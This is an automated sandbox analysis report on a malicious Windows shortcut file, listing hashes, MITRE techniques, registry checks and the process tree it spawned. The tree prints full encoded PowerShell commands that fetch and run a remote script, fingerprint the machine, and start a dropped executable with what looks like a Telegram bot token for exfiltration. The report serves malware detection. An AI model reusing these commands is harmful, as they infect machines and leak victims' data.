6d51b225bf9e61258f0a40274f0427d8b27a57f11d6a23b7371587b1d1fcde82

Analysis

max time kernel
139s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
20/09/2023, 15:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmpyl4tkeg5.lnk
Size

6.0MB
MD5

e4c11bee612af2f2f0d1361b098e456d
SHA1

6f781c365ee30354378c3a671694976c6931e0de
SHA256

6d51b225bf9e61258f0a40274f0427d8b27a57f11d6a23b7371587b1d1fcde82
SHA512

78bc40ad85bfdb510c3502ac2e15e44e8d15eed226452bc52a004e1fb82a93b95abcad199fd38da45d224176a8c86db29ee87421ece0ed03aeca5acecbcc5578
SSDEEP

384:9D0kk0QMlgiCvN0kkj1KcMz0kk3B0kk7WShStbMS7StxSPE0kkdsHZ:9D3kIlS3kj1Kce3kR3k7WwwMGOt3kdQ

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://wordpress.d

Signatures

Detect suspicious LNK files with LOLBins [1ZRR4H] 1 IoCs

resource	yara_rule
behavioral2/files/0x000700000002305d-2.dat	LNK_sospechosos

Blocklisted process makes network request 2 IoCs

flow	pid	Process
26	4676	powershell.exe
31	1764	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3772	svczHost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4240	WINWORD.EXE
4240	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4060	powershell.exe
4060	powershell.exe
4676	powershell.exe
4676	powershell.exe
1764	powershell.exe
1764	powershell.exe
2672	powershell.exe
2672	powershell.exe
3772	svczHost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeIncreaseQuotaPrivilege	4676	powershell.exe
Token: SeSecurityPrivilege	4676	powershell.exe
Token: SeTakeOwnershipPrivilege	4676	powershell.exe
Token: SeLoadDriverPrivilege	4676	powershell.exe
Token: SeSystemProfilePrivilege	4676	powershell.exe
Token: SeSystemtimePrivilege	4676	powershell.exe
Token: SeProfSingleProcessPrivilege	4676	powershell.exe
Token: SeIncBasePriorityPrivilege	4676	powershell.exe
Token: SeCreatePagefilePrivilege	4676	powershell.exe
Token: SeBackupPrivilege	4676	powershell.exe
Token: SeRestorePrivilege	4676	powershell.exe
Token: SeShutdownPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeSystemEnvironmentPrivilege	4676	powershell.exe
Token: SeRemoteShutdownPrivilege	4676	powershell.exe
Token: SeUndockPrivilege	4676	powershell.exe
Token: SeManageVolumePrivilege	4676	powershell.exe
Token: 33	4676	powershell.exe
Token: 34	4676	powershell.exe
Token: 35	4676	powershell.exe
Token: 36	4676	powershell.exe
Token: SeIncreaseQuotaPrivilege	4676	powershell.exe
Token: SeSecurityPrivilege	4676	powershell.exe
Token: SeTakeOwnershipPrivilege	4676	powershell.exe
Token: SeLoadDriverPrivilege	4676	powershell.exe
Token: SeSystemProfilePrivilege	4676	powershell.exe
Token: SeSystemtimePrivilege	4676	powershell.exe
Token: SeProfSingleProcessPrivilege	4676	powershell.exe
Token: SeIncBasePriorityPrivilege	4676	powershell.exe
Token: SeCreatePagefilePrivilege	4676	powershell.exe
Token: SeBackupPrivilege	4676	powershell.exe
Token: SeRestorePrivilege	4676	powershell.exe
Token: SeShutdownPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeSystemEnvironmentPrivilege	4676	powershell.exe
Token: SeRemoteShutdownPrivilege	4676	powershell.exe
Token: SeUndockPrivilege	4676	powershell.exe
Token: SeManageVolumePrivilege	4676	powershell.exe
Token: 33	4676	powershell.exe
Token: 34	4676	powershell.exe
Token: 35	4676	powershell.exe
Token: 36	4676	powershell.exe
Token: SeIncreaseQuotaPrivilege	4676	powershell.exe
Token: SeSecurityPrivilege	4676	powershell.exe
Token: SeTakeOwnershipPrivilege	4676	powershell.exe
Token: SeLoadDriverPrivilege	4676	powershell.exe
Token: SeSystemProfilePrivilege	4676	powershell.exe
Token: SeSystemtimePrivilege	4676	powershell.exe
Token: SeProfSingleProcessPrivilege	4676	powershell.exe
Token: SeIncBasePriorityPrivilege	4676	powershell.exe
Token: SeCreatePagefilePrivilege	4676	powershell.exe
Token: SeBackupPrivilege	4676	powershell.exe
Token: SeRestorePrivilege	4676	powershell.exe
Token: SeShutdownPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeSystemEnvironmentPrivilege	4676	powershell.exe
Token: SeRemoteShutdownPrivilege	4676	powershell.exe
Token: SeUndockPrivilege	4676	powershell.exe
Token: SeManageVolumePrivilege	4676	powershell.exe
Token: 33	4676	powershell.exe
Token: 34	4676	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
4240	WINWORD.EXE
4240	WINWORD.EXE
4240	WINWORD.EXE
4240	WINWORD.EXE
4240	WINWORD.EXE
4240	WINWORD.EXE
4240	WINWORD.EXE
4240	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1704 wrote to memory of 4060	1704	cmd.exe	86
PID 1704 wrote to memory of 4060	1704	cmd.exe	86
PID 4060 wrote to memory of 4676	4060	powershell.exe	87
PID 4060 wrote to memory of 4676	4060	powershell.exe	87
PID 4676 wrote to memory of 1764	4676	powershell.exe	91
PID 4676 wrote to memory of 1764	4676	powershell.exe	91
PID 1764 wrote to memory of 4240	1764	powershell.exe	93
PID 1764 wrote to memory of 4240	1764	powershell.exe	93
PID 4676 wrote to memory of 3772	4676	powershell.exe	95
PID 4676 wrote to memory of 3772	4676	powershell.exe	95
PID 3772 wrote to memory of 2672	3772	svczHost.exe	97
PID 3772 wrote to memory of 2672	3772	svczHost.exe	97

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\tmpyl4tkeg5.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JABzAGoAaQBqAHEAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAFoAMABFADIAUQBVAFYARgBRAFYAVgAzAFEAawBSAEIAUgBXAHQAQgBVADEARgBCAGQAVQBGAEYAWQAwAEYAYQBVAFUASQB3AFEAVQBaAE4AUQBXAFIAQgBRAG4AbABCAFIAMgB0AEIAWQBtAGQAQwBiAGsARgBEAFoAMABGAFgAZAAwAEoAVQBRAFUAaAByAFEAVwBOADMAUQBqAEIAQgBSADEAVgBCAFkAbABGAEIAZABVAEYARgBUAFUARgBpAGQAMABKADEAUQBVAGgAWgBRAFYAcABSAFEAbgBsAEIAUwBGAEYAQgBXAEYARgBCAE4AawBGAEUAYgAwAEYAUwBaADAASgA1AFEAVQBjADQAUQBXAEoAUgBRAGsATgBCAFIAMABWAEIAWQAzAGQAQwBiAEUARgBFAFcAVQBGAE8AUQBVAEoAVQBRAFUAaABSAFEAVwBOAG4AUQBuAEIAQgBSAHoAUgBCAFcAbgBkAEIAYgAwAEYARABTAFUARgBhAFEAVQBKAFkAUQBVAFUAMABRAFUAMQBCAFEAbABwAEIAUgBtAE4AQgBZAFgAZABDAE0AVQBGAEgAVgBVAEYAVABRAFUASgB6AFEAVQBSAFoAUQBWAFIAQgBRAFgAbABCAFIAbQA5AEIAWQAwAEYAQwBhAFUARgBGAFkAMABGAFcAVQBVAEkAeQBRAFUAZABOAFEAVgBOAEIAUQBrADUAQgBTAEYAbABCAFcAbABGAEMAUwBFAEYARgBNAEUARgBrAGQAMABKAG8AUQBVAFoAbgBRAFYAcAAzAFEAagBGAEIAUgAwADEAQgBVADAARgBDAFQAawBGAEkAWgAwAEYASgBaADAARgB3AFEAVQBOAHIAUQBVADkAMwBRAFUAdABCAFEAMQBGAEIAWQBWAEYAQwBNAFUARgBJAGIAMABGAGkAUQBVAEoANgBRAFUAZABGAFEAVwBOAFIAUQBuAEYAQgBSAEQAQgBCAFYAMwBkAEMAVgBFAEYASQBhADAARgBqAGQAMABJAHcAUQBVAGQAVgBRAFcASgBSAFEAWABWAEIAUgBsAEYAQgBXAGwARgBDAE4ARQBGAEkAVQBVAEYATQBaADAASgBHAFEAVQBjADAAUQBWAGwAMwBRAG4AWgBCAFIAMQBGAEIAWQBWAEYAQwBkAFUARgBIAFkAMABGAFkAVQBVAEUAMgBRAFUAUgB2AFEAVgBGAFIAUQBsAFIAQgBSAFUAMQBCAFUAMQBGAEMAUwBrAEYARABOAEUARgBTAGQAMABKAHMAUQBVAGgAUgBRAFYAVgAzAFEAagBCAEIAUwBFAGwAQgBZAFYARgBDAGQAVQBGAEgAWQAwAEYATABRAFUASgBpAFEAVQBaAE4AUQBXAFYAUgBRAG4AcABCAFMARgBGAEIAVwBsAEYAQwBkAEUARgBEAE4ARQBGAFIAZAAwAEoAMgBRAFUAYwAwAFEAVwBSAG4AUQBtAHgAQgBTAEUAbABCAFoARQBGAEMAWgBFAEYARQBiADAARgBQAFoAMABKAEgAUQBVAGgASgBRAFcASgAzAFEAbgBSAEIAUgBVAGwAQgBXAFYARgBDAGUAawBGAEgAVgBVAEYATwBaADAARQB3AFEAVQBaAE4AUQBXAFIAQgBRAG4AbABCAFIAMgB0AEIAWQBtAGQAQwBiAGsARgBEAFoAMABGAEoAWgAwAEoAbwBRAFUAVgBuAFEAVgBWAG4AUQBYAGQAQgBSADAAMQBCAFUAMABGAEMAVABrAEYARQBXAFUARgBVAFEAVQBJADEAUQBVAFIAcgBRAFUAMQAzAFEAbQBsAEIAUgBFADEAQgBVADIAZABDAGMAawBGAEgAVABVAEYAVABRAFUASgBMAFEAVQBkADMAUQBWAGwAMwBRAFgAcABCAFIAVABCAEIAWgBGAEYAQwBZAFUARgBGAFIAVQBGAFEAVQBVAEUANQBRAFUATgBKAFEAVQB0AFIAUQBYAEIAQgBSAEgATgBCAFEAMgBkAEIAYQAwAEYASABUAFUARgBpAGQAMABKADEAUQBVAGgAUgBRAFYAcABSAFEAbgBWAEIAUwBGAEYAQgBTAFUARgBCAE8AVQBGAEQAUQBVAEYAVABVAFUASgAxAFEAVQBoAFoAUQBXAEoAMwBRAG4ASgBCAFIAMQBWAEIAVABGAEYAQwBXAEUARgBIAFYAVQBGAFoAWgAwAEoAVABRAFUAZABWAFEAVwBOAFIAUQBqAEYAQgBSADEAVgBCAFkAMwBkAEMATQBFAEYARABRAFUARgBNAFUAVQBKAFcAUQBVAGgASgBRAFcARgBSAFEAVwBkAEIAUQAyAGQAQgBTAGsARgBDAGMARQBGAEkAVgBVAEYAbABaADAASgB6AFEAVQBoAE4AUQBWAGwAUgBRAG4AaABCAFIAMgA5AEIAUwBVAEYAQgBjAGsARgBEAFEAVQBGAEsAUQBVAEoAeQBRAFUAYwB3AFEAVwBOAG4AUQBqAE4AQgBSAHoAUgBCAFkAawBGAEIAYwBFAEYARABRAFUARgBNAFUAVQBKAFcAUQBVAGgATgBRAFYAcABSAFEAawBOAEIAUgAwAFYAQgBZADMAZABDAGMARQBGAEgAVABVAEYAVgBRAFUASgBvAFEAVQBoAEoAUQBXAE4AMwBRAG4AQgBCAFIAegBSAEIAVwBuAGQAQgBTADAARgBGAGEAMABGAGkAWgAwAEkAeQBRAFUAYwA0AFEAVwBGADMAUQBtAHgAQgBRAHoAQgBCAFUAbABGAEMATgBFAEYASQBRAFUARgBqAFoAMABKAHMAUQBVAGgATgBRAFcATgAzAFEAbgBCAEIAUgB6AGgAQgBZAG0AZABCAFoAMABGAEQAVQBVAEYAWgBkADAASgAyAFEAVQBjADAAUQBXAFIAQgBRAG0AeABCAFIAegBSAEIAWgBFAEYAQgBkAFUARgBGAFQAVQBGAGkAZAAwAEoAMQBRAFUAaABSAFEAVgBwAFIAUQBuAFYAQgBTAEYARgBCAFEAMgBkAEIAUABRAD0APQAiACkAKQA7AAoAJABvAHYAawBrAGUAZgB1AGYAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAEwAVQBWAHUAWQAyADkAawBaAFcAUgBEAGIAMgAxAHQAWQBXADUAawBJAEUAcABCAFEAbgBKAEIAUgB6AEIAQgBZADIAZABDAE0AMABGAEgATgBFAEYAaQBRAFUARQA1AFEAVQBaAHoAUQBWAFYAMwBRAGoAVgBCAFMARQAxAEIAWgBFAEYAQwBiAEUARgBIAE0ARQBGAE0AWgAwAEoAVgBRAFUAZABWAFEAVwBWAEIAUQBqAEIAQgBRAHoAUgBCAFUAbABGAEMAZABVAEYASABUAFUARgBpAGQAMABKAHIAUQBVAGQAcgBRAFcASgBuAFEAbQA1AEIAUgBqAEIAQgBUAHcAPQA9ACIAKQApADsACgAkAHYAcABqAGYAYwBrAGQAcgBhAGYAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAFkAMwBWADAAYQBXADkAdQBVAEcAOQBzAGEAVwBOADUASQBHAEoANQBjAEcARgB6AGMAdwA9AD0AIgApACkAOwAKACQAeABwAGsAaABmAG4APQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAEwAVQBWADQAWgBRAD0APQAiACkAKQA7AAoAJABnAGcAcQBkAG8AaQBzAGsAcwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATABWAGQAcABiAG0AUgB2AGQAMQBOADAAZQBXAHgAbABJAEcAaABwAFoARwBSAGwAYgBnAD0APQAiACkAKQA7AAoAJAB4AHgAcgB4AGIAagBhAGQAdgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAIgApACkAOwAKACQAawBpAHMAYgBiAHMAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATABVADUAdgBVAEgASgB2AFoAbQBsAHMAWgBRAD0APQAiACkAKQA7AAoAJAB6AG8AeQBmAGYAawA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAIgApACkAOwAKACQAbwB3AHIAYgBoAGMAYwBiAHAAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATABVADUAdgBUAEcAOQBuAGIAdwA9AD0AIgApACkAOwAKACQAcgBzAHoAZQBkAHUAdQB0AHEAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiACIAKQApADsACgB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAKAHsACgAJAHQAcgB5AAoACQB7AAoACQAJAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnACAALQBWAGUAcgBiACAAcgB1AG4AYQBzACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAKAAkAHIAcwB6AGUAZAB1AHUAdABxACAAKwAgACQAbwB3AHIAYgBoAGMAYwBiAHAAcgApACwAIAAoACQAegBvAHkAZgBmAGsAIAArACAAJABrAGkAcwBiAGIAcwBiACkALAAgACgAJAB4AHgAcgB4AGIAagBhAGQAdgAgACsAIAAkAGcAZwBxAGQAbwBpAHMAawBzACkALAAgACgAJAB4AHAAawBoAGYAbgAgACsAIAAkAHYAcABqAGYAYwBrAGQAcgBhAGYAKQAsACAAKAAkAG8AdgBrAGsAZQBmAHUAZgAgACsAIAAkAHMAagBpAGoAcQApACkAOwAKAAkACQBlAHgAaQB0ADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkAfQAKAH0ACgA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JABrAG0AcgB3AG4AbAA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAZABXAE4AMABZAFcAawB1AGUASABsADYATAAyAFoAcABiAEcAVQB2AGMASABNAHYAZQBHAE0AdwBhAFgAZwB1AGMASABNAHgAIgApACkAOwAKACQAaQB1AHoAbABzAGEAcQBqAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAMwBiADMASgBrAGMASABKAGwAYwAzAE0AdQBaAEEAPQA9ACIAKQApADsACgAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACgAJABpAHUAegBsAHMAYQBxAGoAIAArACAAJABrAG0AcgB3AG4AbAApACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYwBvAG4AdABlAG4AdAAuAEMAbwBuAHQAZQBuAHQACgA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Blocklisted process makes network request
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1764
    - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
        
        "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2.docx" /o ""
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of SetWindowsHookEx
        
        PID:4240
  - - C:\Windows\Temp\svczHost.exe
      "C:\Windows\Temp\svczHost.exe" 6199273323:AAHXE-ke2qDK8FiwavkWDQ950wUMnOUMlfM -1001390383947 khiem2
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3772
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEkAZABlAG4AdABpAHQAeQB7AAoAIAAgACAAIAAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKACQAdABlAHMAdAAgAD0AIABHAGUAdAAtAEkAZABlAG4AdABpAHQAeQA7AAoAJAB0AGUAcwB0ACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBkAGUAdgBpAGMAZQBJAGQALgB0AHgAdAAiACAALQBFAG4AYwBvAGQAaQBuAGcAIABVAFQARgA4AA==
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
